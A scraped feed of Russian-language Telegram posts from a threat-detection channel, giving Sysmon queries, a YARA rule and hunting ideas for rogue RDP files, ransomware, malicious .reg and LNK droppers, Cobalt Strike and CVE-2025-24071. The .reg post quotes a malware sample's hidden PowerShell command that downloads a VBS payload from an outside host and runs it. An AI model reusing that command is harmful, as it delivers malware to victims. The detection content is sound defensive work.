Detection is easy
Всем привет!) 👋 Продолжим тему с фишингом 💌 , компания Innostage поделилась техникой с помощью которой их хотели взломать - rogue rdp 🔤 Пользователю на почту приходит письмо с файлом *.rdp 🔤 Пользователь открывает файл и подключается к удаленному серверу…
Всем привет!) 👋
Вспомним про rogue rdp)
Давайте попробуем похантить? Может нас где-то пробили?💻
🔤 В реестре есть ключ -
который хранить адреса серверов к которым мы подключались
🔤 Второй ключ хранит, адрес, домен\логин с которым подключались
Собрав информацию из этих ключей, мы можем найти выбросы - хосты, с которых не должны подключаться по RDP в локальной сети, или подключения на адреса за пределами корпоративной сетки
Больше информации про артефакты RDP можно почитать здесь
#detection@detectioneasy
Вспомним про rogue rdp)
Давайте попробуем похантить? Может нас где-то пробили?
HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Defaultкоторый хранить адреса серверов к которым мы подключались
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Terminal Server Client\ServersСобрав информацию из этих ключей, мы можем найти выбросы - хосты, с которых не должны подключаться по RDP в локальной сети, или подключения на адреса за пределами корпоративной сетки
Больше информации про артефакты RDP можно почитать здесь
#detection@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
blog.devolutions.net
Using RDP without leaving traces: the MSTSC public mode
Learn how MSTSC’s /public mode works! It blocks credential caching, session details, and bitmap storage, enhancing security. Discover its impact and how to reset MSTSC for a clean slate.
🔥4👍3🤔2
Вернемся к теме с шифровальщиками 😱
Часто ransomware меняет раширения зашифрованным файлам или добавляет второе. Если ваши средства не остановили процесс шифрования, то можем попытаться обнаружить создание файла с подозрительным раширением💻
Список расширений и названий записок можно посмотреть здесь:
🔤 https://github.com/dannyroemhild/ransomware-fileext-list
🔤 https://github.com/mthcht/awesome-lists/blob/main/Lists/ransomware_extensions_list.csv
🔤 https://gist.github.com/sfponce/7c49269ed5a81f2a55dad39dc7cef5ad
⚠️ Событие Sysmon EventId 11, регистрирует только создание нового файла.
Для примера можем посмотреть Sigma-правило, для его работы нужно включить ETW
Можно добавить в конфиг сисмона имена записок и дать название правилу -
#detection@detectioneasy
Часто ransomware меняет раширения зашифрованным файлам или добавляет второе. Если ваши средства не остановили процесс шифрования, то можем попытаться обнаружить создание файла с подозрительным раширением
Список расширений и названий записок можно посмотреть здесь:
Для примера можем посмотреть Sigma-правило, для его работы нужно включить ETW
logman create trace "Microsoft-Windows-Kernel-File" -p Microsoft-Windows-Kernel-File -o "C:\Logs\Microsoft-Windows-Kernel-File.etl"
Можно добавить в конфиг сисмона имена записок и дать название правилу -
Ransomware, тогда в событиях создания файла сразу будет отображено, на что стоит обратить внимание.#detection@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - dannyroemhild/ransomware-fileext-list: List with File Extensions used by Ransomware
List with File Extensions used by Ransomware. Contribute to dannyroemhild/ransomware-fileext-list development by creating an account on GitHub.
1🔥5❤2👍2
В ряде дроперов пополнение, хакеры используют 🩸
В этом примере злоумышленники прислали PDF-файл, который содержит ссылку. Перейдя по ней пользователь скачает REG-файл.
При открытии reg-файла событие запуска процесса будет содержать
Данный файл создает ключ реестра
Такое поведение мы можем обнаружить:
🔤 создание процесса
🔤 Создание reg-файлов в директориях пользователя
🔤 Добавим детект на основе ADS NTFS
Сэмпл в any.run
#detection@detectioneasy
#ttp@detectioneasy
*.reg-файлы
reg-файлы позволяют изменить значения ключей реестра.
В этом примере злоумышленники прислали PDF-файл, который содержит ссылку. Перейдя по ней пользователь скачает REG-файл.
При открытии reg-файла событие запуска процесса будет содержать
"regedit.exe" "C:\Users\admin\Downloads\pdf_graphics.reg"
Данный файл создает ключ реестра
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\SystemUpdate со значениемcmd.exe /c powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://support.zyfex.free.hr/down/maze.vbs' -OutFile '%TEMP%\maze.vbs'; Start-Process '%TEMP%\maze.vbs
Такое поведение мы можем обнаружить:
ProviderName="Microsoft-Windows-Sysmon" and EventId=1 and Image endswith "regedit.exe" and CommandLine="\.reg($|\s)
ProviderName="Microsoft-Windows-Sysmon" and EventId = 11 and TargetFilename = "?:\Users\.*\.reg"
ProviderName="Microsoft-Windows-Sysmon" and EventId = 15 and TargetFilename endswith ".reg:Zone.Identifier" and Contents=".*ZoneId=3.*"
Сэмпл в any.run
#detection@detectioneasy
#ttp@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
app.any.run
Analysis package_photo.pdf (MD5: 3D89F1BCC3873D106F138F35A9B1D3C6) Malicious activity - Interactive analysis ANY.RUN
Interactive malware hunting service. Live testing of most type of threats in any environments. No installation and no waiting necessary.
1🔥4👍3😁2
Forwarded from ISCRA | InfoSec Club «Ra»
📍Расписание докладов ISCRA Talks 2025
14 марта состоится самое долгожданное мероприятие, на котором вас ждем настоящее погружение в мир информационной безопасности!
ISCRA Talks 2025 — конференция, объединяющая всех любителей инфобеза!
📌 Скорей регистрируйся и выбирай темы докладов, которые обязательно посетишь!
https://iscra-talks.ru/#/register
14 марта состоится самое долгожданное мероприятие, на котором вас ждем настоящее погружение в мир информационной безопасности!
ISCRA Talks 2025 — конференция, объединяющая всех любителей инфобеза!
📌 Скорей регистрируйся и выбирай темы докладов, которые обязательно посетишь!
https://iscra-talks.ru/#/register
1👍6🔥3🎄2🤔1
Detection is easy
Посмотрим чем ещё страшны LNK
What is LNK.pdf
24.2 MB
Презентация с ISCRA Talks
#detection@detectioneasy
#detection@detectioneasy
🔥6❤3👍2
Всем привет! ✌️
Вы следите за изменениями в событиях Windows?
О чем я говорю?) При установке обновления от 14 января 2025, Event ID 4768 и 4769 получат новые поля, с которыми мы познакомимся позднее
#detection@detectioneasy
Вы следите за изменениями в событиях Windows?
О чем я говорю?) При установке обновления от 14 января 2025, Event ID 4768 и 4769 получат новые поля, с которыми мы познакомимся позднее
#detection@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍5🔥5🤔2🤩1
Detection is easy
What is LNK.pdf
В продолжение темы с LNK. Исследование TTP APT37 (ScarCruft, Reaper, Red Eyes)
🔤 Атака начинается с фишинга, содержащего ZIP-вложение, которое скрывает LNK
🔤 При выполнении файл LNK запускает multi-stage атаку с bat и PowerShell
🔤 Аргументы LNK проверяют рабочую директорию, затем рекурсивно ищут файл с определенным размером и расширением LNK в директории Temp
🔤 После обнаружения из LNK извлекается 1 hwpx (файл-приманка) и 3 dat-файла
🔤 Далее цепочка из скриптов загружает в память shellcode, для запуска RokRat. Для взаимодействия с C2 использовались API Dropbox, Yandex Disk и PCloud
Для поиска selfextracted-lnk можем похантить в аргументах cmd и powershell, вхождение Temp и LNK
#ttp@detectioneasy
#detection@detectioneasy
Для поиска selfextracted-lnk можем похантить в аргументах cmd и powershell, вхождение Temp и LNK
#ttp@detectioneasy
#detection@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥5👍3🤔2❤1
Вышел релиз Cobalt Strike 4.11, много интересных изменений. Меня больше зацепило использование DNS over HTTPS (DoH) для взаимодействия с сервером. Готовы к обнаружению?)
Список публичных DoH/DoT резолверов и еще один
Список всех обновлений CS🐎 можно найти здесь
#ttp@detectioneasy
Список публичных DoH/DoT резолверов и еще один
Список всех обновлений CS
#ttp@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
Cobalt Strike
Cobalt Strike 4.11: Shhhhhh, Beacon is Sleeping....
Strike 4.11 introduces a novel Sleepmask, a novel process injection technique, new out-of-the-box obfuscation options for Beacon, asynchronous BOFs, and a DNS over HTTPS (DoH) Beacon.
🔥8👍5🤔2
Очередной NTLM Response disclosure (CVE-2025-24071), вначале было интересно) сейчас хочется верить, что у всех закрыт доступ на внешние smb
Можем обнаружить🔭 :
🔤 В логах Security и Sysmon поискать сессии к порту 445
🔤 создание файла с раширением .library-ms
🔤 yara имеет смысл поискать в директориях пользователея (проверил, не фолсило)
#detection@detectioneasy
Можем обнаружить
ProviderName="Microsoft-Windows-Security-Auditing" and EventId=5156 and DestAddress not in [10.0.0.0/8
, 172.16.0.0/12, 169.254.0.0/16] and DestPort=445
ProviderName="Microsoft-Windows-Sysmon" and EventId=3 and DestinationIp not in [10.0.0.0/8
, 172.16.0.0/12, 169.254.0.0/16] and DestinationPort=445
ProviderName="Microsoft-Windows-Sysmon" and EventId=11 and TargetFileName endswith "\\Users\\.*\.library-ms"
rule detect_malicious_library_ms {
meta:
description = "Detects library-ms files with a search connector pointing"
author = "@d3f0x0 @detectioneasy"
reference = "CVE-2025-24071"
date = "2025-03-19"
score = 80
strings:
$xml_decl = /<\?xml\s+version\s*=\s*["']1\.0["']\s+encoding\s*=\s*["']UTF-8["']\s*\?>/ nocase
$namespace = "http://schemas.microsoft.com/windows/2009/library"
$url_pattern1 = /<url\b[^>]*>\s*\\\\/ wide ascii
$url_pattern2 = /<\/url>/ wide ascii
$connector_open = "<searchConnectorDescription>" wide ascii
$connector_close = "</searchConnectorDescription>" wide ascii
condition:
all of ($xml_decl, $namespace, $url_pattern1, $url_pattern2 ) and
2 of ($connector_open, $connector_close)
}
#detection@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - 0x6rss/CVE-2025-24071_PoC: CVE-2025-24071: NTLM Hash Leak via RAR/ZIP Extraction and .library-ms File
CVE-2025-24071: NTLM Hash Leak via RAR/ZIP Extraction and .library-ms File - 0x6rss/CVE-2025-24071_PoC
🔥6👍3🤔2❤1
привет! ✌️
Что скрывает кричащие название Windows Shortcut Exploit Abused as Zero-Day in Widespread APT Campaigns
По информации на 18 марта майкрософт отказались устранять эту уязвимость
Суть уязвимости, что пользователь не сможет посмотреть содержимое команды в lnk через проводник)
Способ не новый и атакующие ранее вставляли пробелы для этого, trendmicro поделилсь еще символами
Серьезно?) много ли людей проверяет файл с иконкой ворда или пдф
В целом если lnk попопал к пользователю и он успешно запустил его, стоит что-то подтюнить)
Эта возможность (by design🤡 ) нам никак не мешает, события создадутся, аргументы из событий тоже никуда не денутся
🔤 Обнаружим создание LNK в дирректории пользователя
🔤 И добавим детект на основе ADS NTFS
Про lnk говорили на iscra talks
#detection@detectioneasy
Что скрывает кричащие название Windows Shortcut Exploit Abused as Zero-Day in Widespread APT Campaigns
По информации на 18 марта майкрософт отказались устранять эту уязвимость
Суть уязвимости, что пользователь не сможет посмотреть содержимое команды в lnk через проводник)
Способ не новый и атакующие ранее вставляли пробелы для этого, trendmicro поделилсь еще символами
Серьезно?) много ли людей проверяет файл с иконкой ворда или пдф
В целом если lnk попопал к пользователю и он успешно запустил его, стоит что-то подтюнить)
Эта возможность (by design
ProviderName="Microsoft-Windows-Sysmon" and EventId = 11 and TargetFilename = "?:\Users\.*\.lnk"
ProviderName="Microsoft-Windows-Sysmon" and EventId = 15 and TargetFilename = "?:\Users\.*\.lnk:Zone.Identifier" and Contents=".*ZoneId=3.*"
Про lnk говорили на iscra talks
#detection@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
❤9🔥5👍4
tg_image_3048436523.png
15.9 KB
Знали ли Вы, что названия антивирусных вердиктов это не просто набор фраз?) 🤔
Раньше была схема CARO (Computer Antivirus Research Organization) Naming Scheme, которая определяла формат названия вердикта антивируса
Например для Windows Defender,
🔤 HackTool — тип угрозы (здесь: инструмент для взлома). Другие варианты: Trojan, Worm, Ransom.
🔤 Python — платформа/язык
🔤 Impacket — уникальное имя угрозы
🔤 BA — вариант или модификация детекта
Сейчас у разных вендоров данная схема немного изменена, но все стараются ее придерживаться
Нашел статью в которой автор собрал несколько ссылок с наименованиями вендоров
Понимание схемы названия вердиктов может помочь в приоритезации инцидентов.
За основу можно взять CheatSheet от Florian Roth
#detection@detectioneasy
Раньше была схема CARO (Computer Antivirus Research Organization) Naming Scheme, которая определяла формат названия вердикта антивируса
Например для Windows Defender,
HackTool:Python/Impacket.BAСейчас у разных вендоров данная схема немного изменена, но все стараются ее придерживаться
Нашел статью в которой автор собрал несколько ссылок с наименованиями вендоров
Понимание схемы названия вердиктов может помочь в приоритезации инцидентов.
За основу можно взять CheatSheet от Florian Roth
#detection@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥10👍4🤯3